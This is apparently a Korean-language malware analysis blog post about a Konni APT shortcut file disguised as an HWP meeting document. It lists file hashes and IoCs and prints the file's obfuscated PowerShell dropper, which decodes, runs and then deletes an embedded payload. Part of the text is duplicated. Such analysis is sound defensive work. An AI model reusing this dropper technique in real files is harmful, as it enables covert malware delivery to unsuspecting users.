북한 APT Konni(코니)에서 만든 악성코드-1. 알티피_엔지니어링본부 사업개발회의 자료.hwp.lnk(2024.6.28)
Contents
오늘은 북한 APT 인 Konni(코니)에서 만든 악성코드-1. 알티피_엔지니어링본부 사업개발회의 자료.hwp.lnk(2024.6.28)에 대해 글을 적어보겠습니다.
AutoIt(au3) 스크립트를 사용하는 것이 특징이며 아직은 해당 스크립트 방식으로 백신 프로그램 엔진들이 파일 된 파일의 실행 방법에 숙달하지 않았기 때문에 이러한 유형의 공격에 대응하기 위해 해결이 필요합니다.
컴파일된 코어 페이로드는 AutoIt 도구를 사용하여 명령을 읽고 실행한 다음 Windows 시스템에서 지정된 악성 행위 을 수행
AutoIt은 Windows GUI 및 일반 스크립팅 프로그래밍을 자동화하기 위한 무료 스크립팅 언어
해쉬
파일명:1. 알티피_엔지니어링본부 사업개발회의 자료.hwp.lnk
사이즈:2.03 MB
MD5:87dc4c8f67cffc8a9699328face923e2
SHA-1:c5d67fb97a7a824168c872f8557eb52f503c9798
SHA-256:0aaec376904434197bae4f1a10ecfe8d4564d95fdfa8236ea960535710661c5f
악성코드 포함된 PowerShell 코드
StringData
{
namestring: Type: HWP 2022 Document
Size: 1.4 MB
Date modified: 05(/)23/2024 14:51
relativepath: not pr(e)sent
workingdir: not pre(s)ent
commandlinearguments: /c f(o)r /f "tokens=*" %a in ('dir C:\Windows\SysWow64\Win
dowsPo(w)erShell\v1.0\*rshell(.)exe /s /b /od') do call %a "$thumb=0;<#cVv vl
tb#>$sow=Ge(t)-ChildItem *.lnk;<#(S)cC AvLl#>$sow=$sow|<#NKU IALT#(>)where-ob
ject{$_.length -eq 0x(0)020890F};<#hpb BpOs#>$turtle=$sow;<#qca UHRj#(>)$s(o
)w=$sow|<#SKU AbBK#>Select-Object -ExpandProp(e0rty Name;<#PZI XrSY#>if($s(o
)w.length -eq 0){$thumb=1;<#bEY oNnP#>$sow=Get(-)ChildItem -Path $env:TEMP -
Recurse -Filter *.lnk|<#xqH IlRX#>where-object({)$_.length -eq 0x002(0)890F}
|<#nVQ eWoJ#>ForEach-Object{$_.FullName}|<#fgr eAi(U)#>Select-Object -First
1;<#HaC KElI#>$turt(l)e=$sow};<#wpd TXDw#>$exercis(e)=$s(o)w.substring(0,$so
w.length-4);<#ziV bVoR#>$language=[(S)yst(e)m.IO.BinaryReader]::new([System.
IO.File]::open($sow,[System.IO.FileMode]::O(p)e(n),[System.IO.FileAccess]::R
ead,[System.IO.FileShare]::Read));<#dHW HTfJ#>try({)$lan(guage.BaseSt(r)eam.
Seek(0x0000150F,[System.IO.SeekOrigin]::Begin);<#xEb eKFP#>$scream=$languag(
e).Re(a)dBytes(0x00187400);<#CcE BEGf#>}finally{$language.Close()};<#yhE (E)
qBv#>for($teenager=0;<#ulr Nfbg#>$teenager -lt $scre(a)m.count;<#gJE TxsN#>$
teenager++){$scream[$(t)eenager]=$scream[$teenager] -bxor 0x00};<#cCp CqOc#>
[System.IO.File]::WriteAl(l)Bytes($exercise,$scream);<#wcK UzON#>if($thumb -
eq 1){$ruin=$exer(c)ise}else{$ruin='.\'+$exercise};<#QBj mbNt#>& $ruin;<#rNu
Eqav#>remove(-)item -path $turtle -force;<#FXh smYo#>"&mkdir …
AutoIt(au3) 스크립트를 사용하는 것이 특징이며 아직은 해당 스크립트 방식으로 백신 프로그램 엔진들이 파일 된 파일의 실행 방법에 숙달하지 않았기 때문에 이러한 유형의 공격에 대응하기 위해 해결이 필요합니다.
컴파일된 코어 페이로드는 AutoIt 도구를 사용하여 명령을 읽고 실행한 다음 Windows 시스템에서 지정된 악성 행위 을 수행
AutoIt은 Windows GUI 및 일반 스크립팅 프로그래밍을 자동화하기 위한 무료 스크립팅 언어
해쉬
파일명:1. 알티피_엔지니어링본부 사업개발회의 자료.hwp.lnk
사이즈:2.03 MB
MD5:87dc4c8f67cffc8a9699328face923e2
SHA-1:c5d67fb97a7a824168c872f8557eb52f503c9798
SHA-256:0aaec376904434197bae4f1a10ecfe8d4564d95fdfa8236ea960535710661c5f
악성코드 포함된 PowerShell 코드
StringData
{
namestring: Type: HWP 2022 Document
Size: 1.4 MB
Date modified: 05(/)23/2024 14:51
relativepath: not pr(e)sent
workingdir: not pre(s)ent
commandlinearguments: /c f(o)r /f "tokens=*" %a in ('dir C:\Windows\SysWow64\Win
dowsPo(w)erShell\v1.0\*rshell(.)exe /s /b /od') do call %a "$thumb=0;<#cVv vl
tb#>$sow=Ge(t)-ChildItem *.lnk;<#(S)cC AvLl#>$sow=$sow|<#NKU IALT#(>)where-ob
ject{$_.length -eq 0x(0)020890F};<#hpb BpOs#>$turtle=$sow;<#qca UHRj#(>)$s(o
)w=$sow|<#SKU AbBK#>Select-Object -ExpandProp(e0rty Name;<#PZI XrSY#>if($s(o
)w.length -eq 0){$thumb=1;<#bEY oNnP#>$sow=Get(-)ChildItem -Path $env:TEMP -
Recurse -Filter *.lnk|<#xqH IlRX#>where-object({)$_.length -eq 0x002(0)890F}
|<#nVQ eWoJ#>ForEach-Object{$_.FullName}|<#fgr eAi(U)#>Select-Object -First
1;<#HaC KElI#>$turt(l)e=$sow};<#wpd TXDw#>$exercis(e)=$s(o)w.substring(0,$so
w.length-4);<#ziV bVoR#>$language=[(S)yst(e)m.IO.BinaryReader]::new([System.
IO.File]::open($sow,[System.IO.FileMode]::O(p)e(n),[System.IO.FileAccess]::R
ead,[System.IO.FileShare]::Read));<#dHW HTfJ#>try({)$lan(guage.BaseSt(r)eam.
Seek(0x0000150F,[System.IO.SeekOrigin]::Begin);<#xEb eKFP#>$scream=$languag(
e).Re(a)dBytes(0x00187400);<#CcE BEGf#>}finally{$language.Close()};<#yhE (E)
qBv#>for($teenager=0;<#ulr Nfbg#>$teenager -lt $scre(a)m.count;<#gJE TxsN#>$
teenager++){$scream[$(t)eenager]=$scream[$teenager] -bxor 0x00};<#cCp CqOc#>
[System.IO.File]::WriteAl(l)Bytes($exercise,$scream);<#wcK UzON#>if($thumb -
eq 1){$ruin=$exer(c)ise}else{$ruin='.\'+$exercise};<#QBj mbNt#>& $ruin;<#rNu
Eqav#>remove(-)item -path $turtle -force;<#FXh smYo#>"&mkdir …
IoC
c5d67fb97a7a824168c872f8557eb52f503c9798
87dc4c8f67cffc8a9699328face923e2
0aaec376904434197bae4f1a10ecfe8d4564d95fdfa8236ea960535710661c5f
87dc4c8f67cffc8a9699328face923e2
0aaec376904434197bae4f1a10ecfe8d4564d95fdfa8236ea960535710661c5f